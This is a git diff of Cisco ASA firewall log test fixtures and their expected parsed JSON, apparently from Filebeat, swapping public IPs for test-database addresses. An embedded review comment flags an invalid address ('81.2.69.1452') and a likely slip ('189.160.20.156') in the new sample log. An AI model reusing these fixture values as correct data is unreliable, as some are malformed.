@@ -4173,7 +4113,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 11865, + "log.offset": 11940, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -4210,7 +4150,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 11969, + "log.offset": 12045, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -4234,7 +4174,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "event.original": "%ASA-6-713901: Group = 100.60.140.10, IP = 67.43.156.12, All IPSec SA proposals found unacceptable!", "event.outcome": "failure", "event.reason": "All IPSec SA proposals found unacceptable!", "event.severity": 6, @@ -4247,7 +4187,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 12078, + "log.offset": 12154, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -4256,16 +4196,17 @@ "dev01" ], "related.ip": [ - "192.128.1.1" + "67.43.156.12" ], "service.type": "cisco", - "source.address": "192.128.1.1", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "192.128.1.1", + "source.address": "67.43.156.12", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "cisco-asa", "forwarded" 
@@ -4281,7 +4222,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-5-713049: Group = 100.60.140.10, Username = test_user, IP = 1.2.3.4, Security negotiation complete for User (test_user) Responder, Inbound SPI = 0x0000000, Outbound SPI = 0x0000000", + "event.original": "%ASA-5-713049: Group = 100.60.140.10, Username = test_user, IP = 81.2.69.143, Security negotiation complete for User (test_user) Responder, Inbound SPI = 0x0000000, Outbound SPI = 0x0000000", "event.severity": 5, "event.timezone": "-02:00", "event.type": [ @@ -4291,7 +4232,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 12205, + "log.offset": 12282, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -4300,22 +4241,22 @@ "dev01" ], "related.ip": [ - "1.2.3.4" + "81.2.69.143" ], "related.user": [ "test_user" ], "service.type": "cisco", - "source.address": "1.2.3.4", - "source.geo.city_name": "Moscow", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "RU", - "source.geo.country_name": "Russia", - "source.geo.location.lat": 55.7527, - "source.geo.location.lon": 37.6172, - "source.geo.region_iso_code": "RU-MOW", - "source.geo.region_name": "Moscow", - "source.ip": "1.2.3.4", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "cisco-asa", "forwarded" @@ -4349,7 +4290,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 12414, + "log.offset": 12495, "network.community_id": "1:Uo11LCySQ1S0c9jtHZVIb4Pm/2k=", "network.iana_number": 47, "observer.egress.interface.name": "inside", 
@@ -4388,7 +4329,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-4-106023: Deny icmp src OUTSIDE:2a05:d016:add:4002:91f2:a9b2:e09a:6fc6 dst OUTSIDE:fe00:afa0::1 (type 128, code 0) by access-group \"OUTSIDE_in\"", + "event.original": "%ASA-4-106023: Deny icmp src OUTSIDE:2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dst OUTSIDE:fe00:afa0::1 (type 128, code 0) by access-group \"OUTSIDE_in\"", "event.outcome": "failure", "event.severity": 4, "event.timezone": "-02:00", @@ -4400,8 +4341,8 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 12550, - "network.community_id": "1:VA3lwFPBuRus2kxMs1BexFp+gp4=", + "log.offset": 12631, + "network.community_id": "1:vW44peXVlakl8z8Pk6oaF4JDxm8=", "network.iana_number": 1, "network.transport": "icmp", "observer.egress.interface.name": "OUTSIDE", @@ -4414,22 +4355,17 @@ "dev01" ], "related.ip": [ - "2a05:d016:add:4002:91f2:a9b2:e09a:6fc6", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "fe00:afa0::1" ], "service.type": "cisco", - "source.address": "2a05:d016:add:4002:91f2:a9b2:e09a:6fc6", - "source.as.number": 16509, - "source.as.organization.name": "Amazon.com, Inc.", - "source.geo.city_name": "Stockholm", + "source.address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "SE", - "source.geo.country_name": "Sweden", - "source.geo.location.lat": 59.3333, - "source.geo.location.lon": 18.05, - "source.geo.region_iso_code": "SE-AB", - "source.geo.region_name": "Stockholm", - "source.ip": "2a05:d016:add:4002:91f2:a9b2:e09a:6fc6", + "source.geo.country_iso_code": "NO", + "source.geo.country_name": "Norway", + "source.geo.location.lat": 62.0, + "source.geo.location.lon": 10.0, + "source.ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "tags": [ "cisco-asa", "forwarded" 
@@ -4440,18 +4376,10 @@ "cisco.asa.destination_interface": "identity", "cisco.asa.message_id": "302016", "cisco.asa.source_interface": "OUTSIDE", - "destination.address": "85.0.0.1", - "destination.as.number": 3303, - "destination.as.organization.name": "Bluewin", - "destination.geo.city_name": "Kolliken", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "CH", - "destination.geo.country_name": "Switzerland", - "destination.geo.location.lat": 47.3388, - "destination.geo.location.lon": 8.0264, - "destination.geo.region_iso_code": "CH-AG", - "destination.geo.region_name": "Aargau", - "destination.ip": "85.0.0.1", + "destination.address": "1.128.3.4", + "destination.as.number": 1221, + "destination.as.organization.name": "Telstra Pty Ltd", + "destination.ip": "1.128.3.4", "destination.port": 500, "event.action": "flow-expiration", "event.category": [ @@ -4463,7 +4391,7 @@ "event.end": "2020-04-27T02:03:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-4-302016: Teardown UDP connection 123364823 for OUTSIDE:82.0.0.1/500 to identity:85.0.0.1/500 duration 92:24:20 bytes 4671944", + "event.original": "%ASA-4-302016: Teardown UDP connection 123364823 for OUTSIDE:67.43.156.13/500 to identity:1.128.3.4/500 duration 92:24:20 bytes 4671944", "event.severity": 4, "event.start": "2020-04-23T07:38:43.000Z", "event.timezone": "-02:00", @@ -4475,9 +4403,9 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 12727, + "log.offset": 12808, "network.bytes": 4671944, - "network.community_id": "1:rwM9yFUsWh6N2utKviU7S94dS9U=", + "network.community_id": "1:ta82v3m+2fof9auTYfgRKH53JMY=", "network.iana_number": 17, "network.transport": "udp", "observer.egress.interface.name": "identity", 
@@ -4490,19 +4418,18 @@ "dev01" ], "related.ip": [ - "82.0.0.1", - "85.0.0.1" + "1.128.3.4", + "67.43.156.13" ], "service.type": "cisco", - "source.address": "82.0.0.1", - "source.as.number": 5089, - "source.as.organization.name": "Virgin Media Limited", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "GB", - "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.4964, - "source.geo.location.lon": -0.1224, - "source.ip": "82.0.0.1", + "source.address": "67.43.156.13", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.port": 500, "tags": [ "cisco-asa", @@ -4536,7 +4463,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 12886, + "log.offset": 12972, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -4577,7 +4504,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 13116, + "log.offset": 13202, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -4618,7 +4545,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 13351, + "log.offset": 13437, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -4659,7 +4586,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 13593, + "log.offset": 13679, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", diff --git a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json index 9335237a31b6..0156348bd70f 100644 --- a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json 
+++ b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json
@@ -520,13 +520,6 @@
 "cisco.asa.rule_name": "filter",
 "cisco.asa.source_interface": "inside",
 "destination.address": "1.2.33.40",
- "destination.geo.continent_name": "Asia",
- "destination.geo.country_iso_code": "CN",
- "destination.geo.country_name": "China",
- "destination.geo.location.lat": 23.1167,
- "destination.geo.location.lon": 113.25,
- "destination.geo.region_iso_code": "CN-GD",
- "destination.geo.region_name": "Guangdong",
 "destination.ip": "1.2.33.40",
 "destination.port": 8080,
 "event.action": "firewall-rule",
diff --git a/x-pack/filebeat/module/cisco/asa/test/dap_records.log b/x-pack/filebeat/module/cisco/asa/test/dap_records.log
index a02a1136b19d..950061569df0 100644
--- a/x-pack/filebeat/module/cisco/asa/test/dap_records.log
+++ b/x-pack/filebeat/module/cisco/asa/test/dap_records.log
@@ -1 +1 @@
-Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2
+Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.143, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2
diff --git a/x-pack/filebeat/module/cisco/asa/test/dap_records.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/dap_records.log-expected.json
index e86dd81aead3..f1aa148f9cf8 100644
--- a/x-pack/filebeat/module/cisco/asa/test/dap_records.log-expected.json
+++ b/x-pack/filebeat/module/cisco/asa/test/dap_records.log-expected.json
@@ -14,7 +14,7 @@
 "event.dataset": "cisco.asa",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2",
+ "event.original": "%ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.143, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2",
 "event.severity": 6,
 "event.timezone": "-02:00",
 "event.type": [
@@ -28,19 +28,19 @@
 "observer.type": "firewall",
 "observer.vendor": "Cisco",
 "related.ip": [
- "1.2.3.4"
+ "81.2.69.143"
 ],
 "service.type": "cisco",
- "source.address": "1.2.3.4",
- "source.geo.city_name": "Moscow",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "RU",
- "source.geo.country_name": "Russia",
- "source.geo.location.lat": 55.7527,
- "source.geo.location.lon": 37.6172,
- "source.geo.region_iso_code": "RU-MOW",
- "source.geo.region_name": "Moscow",
- "source.ip": "1.2.3.4",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "cisco-asa",
 "forwarded"
diff --git a/x-pack/filebeat/module/cisco/asa/test/sample.log b/x-pack/filebeat/module/cisco/asa/test/sample.log
index 6553ffa18efd..e662031d34dd 100644
--- a/x-pack/filebeat/module/cisco/asa/test/sample.log
+++ b/x-pack/filebeat/module/cisco/asa/test/sample.log
@@ -69,19 +69,19 @@ Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traf
 Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app
 Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com
 Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside
-Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username)
+Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.143/49926)(LOCAL\username) to vlan-42:81.2.69.143/80 (81.2.69.143/80) (username)
 Jan 13 2021 19:12:37: %ASA-5-304001: USER001@192.168.0.1(LOCAL\USER001) Accessed URL 172.17.6.211:http://testingserver.com/somewebpage.html
-Jan 13 2021 19:12:37: %ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:85.0.0.1/12312 (62.0.0.1/34534)(LOCAL\USER001) to OUTSIDE:81.0.0.1/443 (81.0.0.1/443) (USER001)
-Jan 13 2021 19:12:37: %ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:85.0.0.1/12312 (62.0.0.1/34534)(LOCAL\user@domain.tld) to OUTSIDE:81.0.0.1/443 (81.0.0.1/443) (user@domain.tld)
-Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(LOCAL\USER001) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (USER001) type 3 code 3
-Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(LOCAL\user@domain.tld) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (user@domain.tld) type 3 code 3
-Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(AD\USER002) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (USER002) type 3 code 3
+Jan 13 2021 19:12:37: %ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:1.128.3.4/12312 (62.0.0.1/34534)(LOCAL\USER001) to OUTSIDE:89.160.20.156/443 
(89.160.20.156/443) (USER001)
+Jan 13 2021 19:12:37: %ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:1.128.3.4/12312 (62.0.0.1/34534)(LOCAL\user@domain.tld) to OUTSIDE:89.160.20.156/443 (89.160.20.156/443) (user@domain.tld)
+Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(LOCAL\USER001) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (USER001) type 3 code 3
+Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(LOCAL\user@domain.tld) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (user@domain.tld) type 3 code 3
+Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 1.128.3.4/0(AD\USER002) gaddr 89.160.20.156/0 laddr 89.160.20.156/0 (USER002) type 3 code 3
 Jan 15 2021 19:12:37: %ASA-6-305012: Teardown dynamic TCP translation from OUTSIDE:192.168.0.1/59677(LOCAL\USER001) to OUTSIDE:75.0.0.1/18449 duration 0:00:00
 Jan 15 2021 19:12:37: %ASA-6-302021: Teardown ICMP connection for faddr ff02::1/0 gaddr fe80::2205:baff:fe9d:f637/0 laddr fe80::2205:baff:fe9d:f637/0 type 134 code 0
 Jan 15 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 251933191 for OUTSIDE:fe00::fede:bbe1/62477 (fe00::fede:bbe1/62477) to OUTSIDE:2a03:2880:f253:cb:face:b00c:0:43fe/443 (2a03:2880:f253:cb:face:b00c:0:43fe/443) (soc@danskecommodities.com)
-Jan 15 2021 19:12:37: %ASA-6-305012: Teardown dynamic TCP translation from OUTSIDE:81.0.0.1/50120(LOCAL\domain\USER001) to OUTSIDE:181.0.0.1/50120 duration 0:02:05
-Jan 15 2021 19:12:37: %ASA-6-302014: Teardown TCP connection 261246338 for OUTSIDE:81.0.0.1/50120(LOCAL\domain\USER001) to OUTSIDE:40.0.0.1/443 duration 0:02:05 bytes 9610 TCP FINs from OUTSIDE (domain\USER001)
-Jan 15 2021 19:12:37: %ASA-6-302015: Built inbound UDP connection 261311655 for OUTSIDE:81.0.0.1/63790 (82.0.0.1/63790)(LOCAL\domain\USER001) to INSIDE:192.168.0.1/53 (192.168.0.1/53) (domain\USER001)
-Jan 15 2021 19:12:37: %ASA-6-302016: Teardown UDP connection 
261311655 for OUTSIDE:81.0.0.1/63790(LOCAL\domain\USER001) to INSIDE:192.168.0.1/53 duration 0:00:00 bytes 139 (domain\USER001)
-Jan 15 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 261246338 for OUTSIDE:81.0.0.1/50120 (82.0.0.1/50120)(LOCAL\domain\USER001) to OUTSIDE:40.0.0.1/443 (40.0.0.1/443) (domain\USER001)
-Jul 29 2021 08:35:29: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xABCXYZ) between 12.12.12.12 and 12.12.12.12 (user= 12.12.12.12) has been deleted.
+Jan 15 2021 19:12:37: %ASA-6-305012: Teardown dynamic TCP translation from OUTSIDE:89.160.20.156/50120(LOCAL\domain\USER001) to OUTSIDE:189.160.20.156/50120 duration 0:02:05
+Jan 15 2021 19:12:37: %ASA-6-302014: Teardown TCP connection 261246338 for OUTSIDE:89.160.20.156/50120(LOCAL\domain\USER001) to OUTSIDE:40.0.0.1/443 duration 0:02:05 bytes 9610 TCP FINs from OUTSIDE (domain\USER001)
+Jan 15 2021 19:12:37: %ASA-6-302015: Built inbound UDP connection 261311655 for OUTSIDE:89.160.20.156/63790 (67.43.156.13/63790)(LOCAL\domain\USER001) to INSIDE:192.168.0.1/53 (192.168.0.1/53) (domain\USER001)
+Jan 15 2021 19:12:37: %ASA-6-302016: Teardown UDP connection 261311655 for OUTSIDE:89.160.20.156/63790(LOCAL\domain\USER001) to INSIDE:192.168.0.1/53 duration 0:00:00 bytes 139 (domain\USER001)
+Jan 15 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 261246338 for OUTSIDE:89.160.20.156/50120 (67.43.156.13/50120)(LOCAL\domain\USER001) to OUTSIDE:40.0.0.1/443 (40.0.0.1/443) (domain\USER001)
+Jul 29 2021 08:35:29: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xABCXYZ) between 81.2.69.1452 and 81.2.69.1452 (user= 81.2.69.1452) has been deleted.
diff --git a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json
index 50e7be1889e1..65608c192ee3 100644
--- a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json
+++ b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json
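Review bot: The rewritten `+Jul 29 2021 ... %ASA-6-602304` line at the end of this hunk now contains `81.2.69.1452`, which is not a valid IPv4 address (final octet 1452), and the rewritten `+Jan 15 ... %ASA-6-305012` line produces `189.160.20.156` where every other translated address in the hunk uses `89.160.20.156`; both look like leftovers of a textual substitution applied to the old `12.12.12.12` and `181.0.0.1`. An unparseable address silently changes what the fixture exercises — the regenerated expected output would presumably carry no `source.ip`/`destination.ip`/`related.ip` for the 602304 event — so that line should use an address already adopted here, e.g. `between 81.2.69.143 and 81.2.69.143 (user= 81.2.69.143)`, and `189.160.20.156` should be checked against the intended value before the expected JSON is regenerated. The scrub is also inconsistent: `62.0.0.1`, `40.0.0.1` and `75.0.0.1` are left in place on lines whose other public addresses were swapped for what appear to be GeoIP test-database ranges, so if the goal is to keep arbitrary routable addresses out of the fixtures they should be replaced in the same pass.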
@@ -102,7 +102,7 @@
 ]
 },
 {
- "@timestamp": "2014-04-15T09:34:34.000-04:00",
+ "@timestamp": "2014-04-15T11:34:34.000-02:00",
 "cisco.asa.destination_interface": "outside",
 "cisco.asa.message_id": "106100",
 "cisco.asa.rule_name": "acl_in",
@@ -1964,7 +1964,7 @@
 ]
 },
 {
- "@timestamp": "2018-04-15T09:34:34.000-04:00",
+ "@timestamp": "2018-04-15T11:34:34.000-02:00",
 "cisco.asa.destination_interface": "outside",
 "cisco.asa.message_id": "106100",
 "cisco.asa.rule_name": "acl_in",
@@ -3680,24 +3680,24 @@
 "@timestamp": "2021-01-13T19:12:37.000-02:00",
 "cisco.asa.connection_id": "27215708",
 "cisco.asa.destination_interface": "vlan-42",
- "cisco.asa.mapped_destination_ip": "1.2.3.4",
+ "cisco.asa.mapped_destination_ip": "81.2.69.143",
 "cisco.asa.mapped_destination_port": 80,
- "cisco.asa.mapped_source_ip": "1.2.3.4",
+ "cisco.asa.mapped_source_ip": "81.2.69.143",
 "cisco.asa.mapped_source_port": 49926,
 "cisco.asa.message_id": "302013",
 "cisco.asa.source_interface": "internet",
 "cisco.asa.source_username": "LOCAL\\username",
 "cisco.asa.termination_user": "username",
- "destination.address": "1.2.3.4",
- "destination.geo.city_name": "Moscow",
+ "destination.address": "81.2.69.143",
+ "destination.geo.city_name": "London",
 "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "RU",
- "destination.geo.country_name": "Russia",
- "destination.geo.location.lat": 55.7527,
- "destination.geo.location.lon": 37.6172,
- "destination.geo.region_iso_code": "RU-MOW",
- "destination.geo.region_name": "Moscow",
- "destination.ip": "1.2.3.4",
+ "destination.geo.country_iso_code": "GB",
+ "destination.geo.country_name": "United Kingdom",
+ "destination.geo.location.lat": 51.5142,
+ "destination.geo.location.lon": -0.0931,
+ "destination.geo.region_iso_code": "GB-ENG",
+ "destination.geo.region_name": "England",
+ "destination.ip": "81.2.69.143",
 "destination.port": 80,
 "event.action": "firewall-rule",
 "event.category": [
@@ -3707,7 +3707,7 @@
 "event.dataset": "cisco.asa",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username)",
+ "event.original": "%ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.143/49926)(LOCAL\\username) to vlan-42:81.2.69.143/80 (81.2.69.143/80) (username)",
 "event.severity": 6,
 "event.timezone": "-02:00",
 "event.type": [
@@ -3718,7 +3718,7 @@
 "log.file.path": "sample.log",
 "log.level": "informational",
 "log.offset": 10899,
- "network.community_id": "1:iwVZPCmO/50L3MVqIW0tC5ED+bg=",
+ "network.community_id": "1:6lxM3TRt46lcfZdd21pElFmogG0=",
 "network.direction": "inbound",
 "network.iana_number": 6,
 "network.transport": "tcp",
@@ -3728,8 +3728,8 @@
 "observer.type": "firewall",
 "observer.vendor": "Cisco",
 "related.ip": [
- "1.2.3.4",
- "10.2.3.4"
+ "10.2.3.4",
+ "81.2.69.143"
 ],
 "related.user": [
 "username"
@@ -3737,7 +3737,7 @@
 "service.type": "cisco",
 "source.address": "10.2.3.4",
 "source.ip": "10.2.3.4",
- "source.nat.ip": "1.2.3.4",
+ "source.nat.ip": "81.2.69.143",
 "source.port": 49926,
 "source.user.name": "username",
 "tags": [
@@ -3770,7 +3770,7 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "notification",
- "log.offset": 11080,
+ "log.offset": 11092,
 "observer.product": "asa",
 "observer.type": "firewall",
 "observer.vendor": "Cisco",
@@ -3799,7 +3799,7 @@
 "@timestamp": "2021-01-13T19:12:37.000-02:00",
 "cisco.asa.connection_id": "195207391",
 "cisco.asa.destination_interface": "OUTSIDE",
- "cisco.asa.mapped_destination_ip": "81.0.0.1",
+ "cisco.asa.mapped_destination_ip": "89.160.20.156",
 "cisco.asa.mapped_destination_port": 443,
 "cisco.asa.mapped_source_ip": "62.0.0.1",
 "cisco.asa.mapped_source_port": 34534,
@@ -3807,18 +3807,18 @@
 "cisco.asa.source_interface": "OUTSIDE",
 "cisco.asa.source_username": "LOCAL\\USER001",
 "cisco.asa.termination_user": "USER001",
- "destination.address": "81.0.0.1",
- "destination.as.number": 15704,
- "destination.as.organization.name": "Xtra Telecom S.A.",
- "destination.geo.city_name": "Madrid",
+ "destination.address": "89.160.20.156",
+ "destination.as.number": 29518,
+ "destination.as.organization.name": "Bredband2 AB",
+ "destination.geo.city_name": "Link\u00f6ping",
 "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "ES",
- "destination.geo.country_name": "Spain",
- "destination.geo.location.lat": 40.4143,
- "destination.geo.location.lon": -3.7016,
- "destination.geo.region_iso_code": "ES-M",
- "destination.geo.region_name": "Madrid",
- "destination.ip": "81.0.0.1",
+ "destination.geo.country_iso_code": "SE",
+ "destination.geo.country_name": "Sweden",
+ "destination.geo.location.lat": 58.4167,
+ "destination.geo.location.lon": 15.6167,
+ "destination.geo.region_iso_code": "SE-E",
+ "destination.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "destination.ip": "89.160.20.156",
 "destination.port": 443,
 "event.action": "firewall-rule",
 "event.category": [
@@ -3828,7 +3828,7 @@
 "event.dataset": "cisco.asa",
 "event.kind": "event",
 "event.module": "cisco",
- "event.original": "%ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:85.0.0.1/12312 (62.0.0.1/34534)(LOCAL\\USER001) to OUTSIDE:81.0.0.1/443 (81.0.0.1/443) (USER001)",
+ "event.original": "%ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:1.128.3.4/12312 (62.0.0.1/34534)(LOCAL\\USER001) to OUTSIDE:89.160.20.156/443 (89.160.20.156/443) (USER001)",
 "event.severity": 5,
 "event.timezone": "-02:00",
 "event.type": [
@@ -3838,8 +3838,8 @@
 "input.type": "log",
 "log.file.path": "sample.log",
 "log.level": "notification",
- "log.offset": 11220,
- "network.community_id": "1:80+NOqHrJ3D1YMNcnBpJC7S6Pkg=",
+ "log.offset": 11232,
+ "network.community_id": "1:k/bYSo4xyVOcBd5vnxfeC3/AAzY=",
 "network.direction": "inbound",
 "network.iana_number": 6,
 "network.transport": "tcp",
@@ -3849,26 +3849,18 @@
 "observer.type": "firewall",
 "observer.vendor": "Cisco",
 "related.ip": [
+ "1.128.3.4",
 "62.0.0.1",
- "81.0.0.1",
- "85.0.0.1"
+ "89.160.20.156"
 ],
 "related.user": [
 "USER001"
 ],
 "service.type": "cisco",
- "source.address": "85.0.0.1",
- "source.as.number": 3303,
- "source.as.organization.name": "Bluewin",
- "source.geo.city_name": "Kolliken",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "CH",
- "source.geo.country_name": "Switzerland",
- "source.geo.location.lat": 47.3388,
- "source.geo.location.lon": 8.0264,
- "source.geo.region_iso_code": "CH-AG",
- "source.geo.region_name": "Aargau",
- "source.ip": "85.0.0.1",
+ "source.address": "1.128.3.4",
+ "source.as.number": 1221,
+ "source.as.organization.name": "Telstra Pty Ltd",
+ "source.ip": "1.128.3.4",
 "source.nat.ip": "62.0.0.1",
 "source.nat.port": "34534",
 "source.port": 12312,
@@ -3882,7 +3874,7 @@
 "@timestamp": "2021-01-13T19:12:37.000-02:00",
 "cisco.asa.connection_id": "195207391",
 "cisco.asa.destination_interface": "OUTSIDE",
- "cisco.asa.mapped_destination_ip": "81.0.0.1",
+ "cisco.asa.mapped_destination_ip": "89.160.20.156",
 "cisco.asa.mapped_destination_port": 443,
 "cisco.asa.mapped_source_ip": "62.0.0.1",
 "cisco.asa.mapped_source_port": 34534,
@@ -3890,18 +3882,18 @@
 "cisco.asa.source_interface": "OUTSIDE",
 "cisco.asa.source_username": "LOCAL\\user@domain.tld",
 "cisco.asa.termination_user": "user@domain.tld",
- "destination.address": "81.0.0.1",
- "destination.as.number": 15704,
- "destination.as.organization.name": "Xtra Telecom S.A.",
- "destination.geo.city_name": "Madrid",
+ "destination.address": "89.160.20.156",
+ "destination.as.number": 29518,
+ "destination.as.organization.name": "Bredband2 AB",
+ "destination.geo.city_name": "Link\u00f6ping",
 "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "ES",
- "destination.geo.country_name": "Spain",
- "destination.geo.location.lat": 40.4143,
- "destination.geo.location.lon": -3.7016,
- "destination.geo.region_iso_code": "ES-M",
- "destination.geo.region_name": "Madrid",
- "destination.ip": "81.0.0.1",
+ "destination.geo.country_iso_code": "SE",
+ "destination.geo.country_name": "Sweden",
+ "destination.geo.location.lat": 58.4167,
+ "destination.geo.location.lon": 15.6167,
+ "destination.geo.region_iso_code": "SE-E",
+ "destination.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "destination.ip": "89.160.20.156",
 "destination.port": 443,
 "event.action": "firewall-rule",
 "event.category": [
@@ -3911,7 +3903,7 @@
 "event.dataset": "cisco.asa",
 "event.kind": "event",
 "event.module": "cisco",
